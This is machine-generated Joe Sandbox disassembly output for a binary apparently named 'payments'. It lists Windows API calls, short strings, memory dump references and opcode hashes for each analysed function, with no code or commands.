                                                                                                                          • Instruction Fuzzy Hash: 4F41F672A0020ABBDF209BA4DC86FEF77B9AF49700F00406AF601EB181D770DA05DB61
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00CFA85A
                                                                                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00CFA86F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend
                                                                                                                          • String ID: '
                                                                                                                          • API String ID: 3850602802-1997036262
                                                                                                                          • Opcode ID: 1bedf4cf876dfe06142e8f0542992d1fb8fde65c0803b958cc6b133e28fa5cfc
                                                                                                                          • Instruction ID: 3fbe7efd524d4a6c7b46cad70d55b13bdbe653ab799ff1f45b11e527f733ae55
                                                                                                                          • Opcode Fuzzy Hash: 1bedf4cf876dfe06142e8f0542992d1fb8fde65c0803b958cc6b133e28fa5cfc
                                                                                                                          • Instruction Fuzzy Hash: 4B41EBB4A0130D9FDB54DF65C881BEABBB5FB08340F14006AEA19EB381D770A941CFA1
                                                                                                                          APIs
                                                                                                                          • _memset.LIBCMT ref: 00CE5190
                                                                                                                          • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 00CE51C6
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CrackInternet_memset
                                                                                                                          • String ID: |
                                                                                                                          • API String ID: 1413715105-2343686810
                                                                                                                          • Opcode ID: 0a5ca5bd96c0a54dd0bc94bde86ff280eb22c63249fb8a0a5280225cd2f336de
                                                                                                                          • Instruction ID: a1bc13daf88a301309bda22c45f56cde38b77fedd00587660812150a21a3342b
                                                                                                                          • Opcode Fuzzy Hash: 0a5ca5bd96c0a54dd0bc94bde86ff280eb22c63249fb8a0a5280225cd2f336de
                                                                                                                          • Instruction Fuzzy Hash: E1313971C00119AFCF01EFA5CC85AEEBFB9FF18704F104019F915A6166EB35AA06DBA0
                                                                                                                          APIs
                                                                                                                          • DestroyWindow.USER32(?,?,?,?), ref: 00CF980E
                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00CF984A
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$DestroyMove
                                                                                                                          • String ID: static
                                                                                                                          • API String ID: 2139405536-2160076837
                                                                                                                          • Opcode ID: 52c69d821a770ee584853b6d3061abf80b70e73d088547fa51213424a473f681
                                                                                                                          • Instruction ID: fbac50465f05f4b0ad734603de740363af234e7ded45c7703ef5ba9bf23a47ff
                                                                                                                          • Opcode Fuzzy Hash: 52c69d821a770ee584853b6d3061abf80b70e73d088547fa51213424a473f681
                                                                                                                          • Instruction Fuzzy Hash: 7B318D71110208AEEF109F64CC80BFB73B9FF59764F008619FAA9C7190DA30AD81DB61
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 00CCC2F7
                                                                                                                          • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00CCC331
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend
                                                                                                                          • String ID: @U=u
                                                                                                                          • API String ID: 3850602802-2594219639
                                                                                                                          • Opcode ID: 448d580d1e6b23657240f4603f4878e2041d705eaab07d63027a6f3f68695176
                                                                                                                          • Instruction ID: 902682df2b30a84e8dbe3ae8d1fed3cc85caafd02d56f53c8835814a13ee5332
                                                                                                                          • Opcode Fuzzy Hash: 448d580d1e6b23657240f4603f4878e2041d705eaab07d63027a6f3f68695176
                                                                                                                          • Instruction Fuzzy Hash: 8E21E672D00215ABCF11AF98D8C1EFEB779EF88700B158119E919A72A0EB709D02D7A0
                                                                                                                          APIs
                                                                                                                          • _memset.LIBCMT ref: 00CD51C6
                                                                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00CD5201
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InfoItemMenu_memset
                                                                                                                          • String ID: 0
                                                                                                                          • API String ID: 2223754486-4108050209
                                                                                                                          • Opcode ID: d7283d0cca74a7824301be16a8d0ff50e36f541cb77dfdad4c683a3428115e82
                                                                                                                          • Instruction ID: fc6a8eb34f559a779c1a7b45f17ea3232f47f6ff9a7563479a25340fa2c94b5d
                                                                                                                          • Opcode Fuzzy Hash: d7283d0cca74a7824301be16a8d0ff50e36f541cb77dfdad4c683a3428115e82
                                                                                                                          • Instruction Fuzzy Hash: 7D31E431A00705ABEB24CF99D845BAEBBF4EF45390F14401EEAA1E63A0D7709B48DB10
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: __snwprintf
                                                                                                                          • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                          • API String ID: 2391506597-2584243854
                                                                                                                          • Opcode ID: 23bf400f8e178716ee87153735d3a573fb72e1a38da6617e95783585280ac9a7
                                                                                                                          • Instruction ID: fb8d38015991ab1204bf88bf9764a811f049078bad69178d7b593288267f55bf
                                                                                                                          • Opcode Fuzzy Hash: 23bf400f8e178716ee87153735d3a573fb72e1a38da6617e95783585280ac9a7
                                                                                                                          • Instruction Fuzzy Hash: 7A21B171A10218AFCF11EFA5C886EEE77B9BF54740F000459F505AB181DB70EA45DBA5
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CD7DB1: GetLocalTime.KERNEL32 ref: 00CD7DBE
                                                                                                                            • Part of subcall function 00CD7DB1: _wcsncpy.LIBCMT ref: 00CD7DF3
                                                                                                                            • Part of subcall function 00CD7DB1: _wcsncpy.LIBCMT ref: 00CD7E25
                                                                                                                            • Part of subcall function 00CD7DB1: _wcsncpy.LIBCMT ref: 00CD7E58
                                                                                                                            • Part of subcall function 00CD7DB1: _wcsncpy.LIBCMT ref: 00CD7E9A
                                                                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00CF95F8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _wcsncpy$LocalMessageSendTime
                                                                                                                          • String ID: @U=u$SysDateTimePick32
                                                                                                                          • API String ID: 2466184910-2530228043
                                                                                                                          • Opcode ID: 8c1d4f8a1b7fcce11f345ba8a4c499bf24789180f5a59b0bd0524a6ff8fbf629
                                                                                                                          • Instruction ID: f6912c0889a77e33a588badf5fbd1c2bcf4c23d7990b8bfbebf7002d50b411c7
                                                                                                                          • Opcode Fuzzy Hash: 8c1d4f8a1b7fcce11f345ba8a4c499bf24789180f5a59b0bd0524a6ff8fbf629
                                                                                                                          • Instruction Fuzzy Hash: 6721D67134020C6FEF629E54CC82FFE336AEB44754F104615FA51AB2D0D6B1ED4197A1
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00CCBBB0
                                                                                                                            • Part of subcall function 00CD422F: GetWindowThreadProcessId.USER32(?,?), ref: 00CD425A
                                                                                                                            • Part of subcall function 00CD422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00CCBBCC,00000034,?,?,00001004,00000000,00000000), ref: 00CD426A
                                                                                                                            • Part of subcall function 00CD422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00CCBBCC,00000034,?,?,00001004,00000000,00000000), ref: 00CD4280
                                                                                                                            • Part of subcall function 00CD430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00CCBC08,?,?,00000034,00000800,?,00000034), ref: 00CD4335
                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00CCBC17
                                                                                                                            • Part of subcall function 00CD42D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00CCBC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00CD4300
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Process$MemoryMessageSend$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                          • String ID: @U=u
                                                                                                                          • API String ID: 1045663743-2594219639
                                                                                                                          • Opcode ID: c36a2afa51377e2c3222699d0814b196f7d5d314390eea24eb11a5c48c4630e3
                                                                                                                          • Instruction ID: e306822831689b0bdf01defe643c4eede91d427c8b9a7b8578afff409f197d90
                                                                                                                          • Opcode Fuzzy Hash: c36a2afa51377e2c3222699d0814b196f7d5d314390eea24eb11a5c48c4630e3
                                                                                                                          • Instruction Fuzzy Hash: 91215E31901228ABDF15ABA8DC85FDEBBB9FF04350F104196F654A7190DB705E45DBA0
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00CF945C
                                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00CF9467
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend
                                                                                                                          • String ID: Combobox
                                                                                                                          • API String ID: 3850602802-2096851135
                                                                                                                          • Opcode ID: 2d42c4c8efcd9b0a3ce36ba8508b3396a92b7b4254b49ae67916fd1e673c35cd
                                                                                                                          • Instruction ID: 9ec1bbcea7800113d2f9c93ede7440b74c918a8866d212990ad8bf87802ee116
                                                                                                                          • Opcode Fuzzy Hash: 2d42c4c8efcd9b0a3ce36ba8508b3396a92b7b4254b49ae67916fd1e673c35cd
                                                                                                                          • Instruction Fuzzy Hash: 9D11B27130020D6FEF519E54DC81FFB3B6EEB983A4F104125FA29972A0D6319D529B61
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: @U=u
                                                                                                                          • API String ID: 0-2594219639
                                                                                                                          • Opcode ID: 516fb5d3e0845bb57c939846bbc033900ae8376ce7a01b1f1f69fda36706db85
                                                                                                                          • Instruction ID: 8800d0c5670c1472b517931abe17e6c27d6ed5f4fa6a8d2a5273afb3d3ba6c89
                                                                                                                          • Opcode Fuzzy Hash: 516fb5d3e0845bb57c939846bbc033900ae8376ce7a01b1f1f69fda36706db85
                                                                                                                          • Instruction Fuzzy Hash: 9611D03534021CBEEF508F64CEA5FB93BA4EB05300F108111FB26EA1D0D670DA10EB66
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00C9103B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00C91052
                                                                                                                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00CCD54E
                                                                                                                          • _strlen.LIBCMT ref: 00CCD559
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Timeout_strlen
                                                                                                                          • String ID: @U=u
                                                                                                                          • API String ID: 2777139624-2594219639
                                                                                                                          • Opcode ID: 5920da9b261e635b67b6acee186cb6fcec50ebfb6525629a2182597c54d9f78d
                                                                                                                          • Instruction ID: b9cf62dcdb11e2dab4857bba958aec94c41733a3b8645581c4a187fbe4e33316
                                                                                                                          • Opcode Fuzzy Hash: 5920da9b261e635b67b6acee186cb6fcec50ebfb6525629a2182597c54d9f78d
                                                                                                                          • Instruction Fuzzy Hash: 5B119171200205ABCF04BEA9DCD6EAE7BA89F55344F00443DF5079B192DE709947A6A0
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CAD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00CAD1BA
                                                                                                                            • Part of subcall function 00CAD17C: GetStockObject.GDI32(00000011), ref: 00CAD1CE
                                                                                                                            • Part of subcall function 00CAD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00CAD1D8
                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00CF9968
                                                                                                                          • GetSysColor.USER32(00000012), ref: 00CF9982
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                          • String ID: static
                                                                                                                          • API String ID: 1983116058-2160076837
                                                                                                                          • Opcode ID: beda577fb67a31b8a47ea134132105a7036146adfed1d5fa2524e9baa4a9a5dd
                                                                                                                          • Instruction ID: 214891b09ba274fbfd4b123725c343d70ac57d9658f705e7a8340e2537081f44
                                                                                                                          • Opcode Fuzzy Hash: beda577fb67a31b8a47ea134132105a7036146adfed1d5fa2524e9baa4a9a5dd
                                                                                                                          • Instruction Fuzzy Hash: 6B11267252020AAFDF05DFB8CC45AFA7BA9FB08354F014628FA56E3250E774E951DB60
                                                                                                                          APIs
                                                                                                                          • _memset.LIBCMT ref: 00CD52D5
                                                                                                                          • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00CD52F4
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InfoItemMenu_memset
                                                                                                                          • String ID: 0
                                                                                                                          • API String ID: 2223754486-4108050209
                                                                                                                          • Opcode ID: b40613b5a220c431910b9770199ded4f2dd818f1e4a00a63d5dcefbe8d0dacec
                                                                                                                          • Instruction ID: 374097a31a2b12779fcc6079b37be7dfbc5b4df96c4c0b0ff5451cc5ca4a5c4c
                                                                                                                          • Opcode Fuzzy Hash: b40613b5a220c431910b9770199ded4f2dd818f1e4a00a63d5dcefbe8d0dacec
                                                                                                                          • Instruction Fuzzy Hash: 4A11E675D01B14EBDB20DF9CD905BAD77B9AB05790F140016EA21E73A0D3B0EE04CBA0
                                                                                                                          APIs
                                                                                                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00CE4DF5
                                                                                                                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00CE4E1E
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Internet$OpenOption
                                                                                                                          • String ID: <local>
                                                                                                                          • API String ID: 942729171-4266983199
                                                                                                                          • Opcode ID: 6feec97b4b40242be7e663f281fd6712a1c9286a940d8b1fabd703ad46a93763
                                                                                                                          • Instruction ID: 4b16c0d55e72fd9699e1cf5393c23562c13efe35c2901453b9da411c095d4528
                                                                                                                          • Opcode Fuzzy Hash: 6feec97b4b40242be7e663f281fd6712a1c9286a940d8b1fabd703ad46a93763
                                                                                                                          • Instruction Fuzzy Hash: D311AC705012A1FBDB298F63CC89EFBFAA8FF06755F10822AF52596180D7706A41C6F0
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(?,?,?,?), ref: 00CFB22B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend
                                                                                                                          • String ID: @U=u
                                                                                                                          • API String ID: 3850602802-2594219639
                                                                                                                          • Opcode ID: 3d157b1000c537b382835f93e261fdbf2c26aaf5ac05d650a4e6528cf30348a6
                                                                                                                          • Instruction ID: 1e2f3e62beb773a9e86ec5af33a75fe8fce59c5ffbd8a7b6853b16f1f3dcccd4
                                                                                                                          • Opcode Fuzzy Hash: 3d157b1000c537b382835f93e261fdbf2c26aaf5ac05d650a4e6528cf30348a6
                                                                                                                          • Instruction Fuzzy Hash: 7121CF7960020EEF8F05DF98C8808AE7BBAFB4D340B004154FE16A3320D731AE21DBA1
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(?,00000401,?,00000000), ref: 00CF9327
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend
                                                                                                                          • String ID: @U=u$button
                                                                                                                          • API String ID: 3850602802-1762282863
                                                                                                                          • Opcode ID: e010ed9603a0d406bfc51994a163b7fea27cd171db0e62fda14d93abd6939157
                                                                                                                          • Instruction ID: b2a2f82af8a041f95af817b461ee9b5857db7e8496b21bb7d947ed3a87189ad2
                                                                                                                          • Opcode Fuzzy Hash: e010ed9603a0d406bfc51994a163b7fea27cd171db0e62fda14d93abd6939157
                                                                                                                          • Instruction Fuzzy Hash: 9C118B72150209ABDF118E64CC41FFA376AFF08364F150214FB65A72A0D776E865AB61
                                                                                                                          APIs
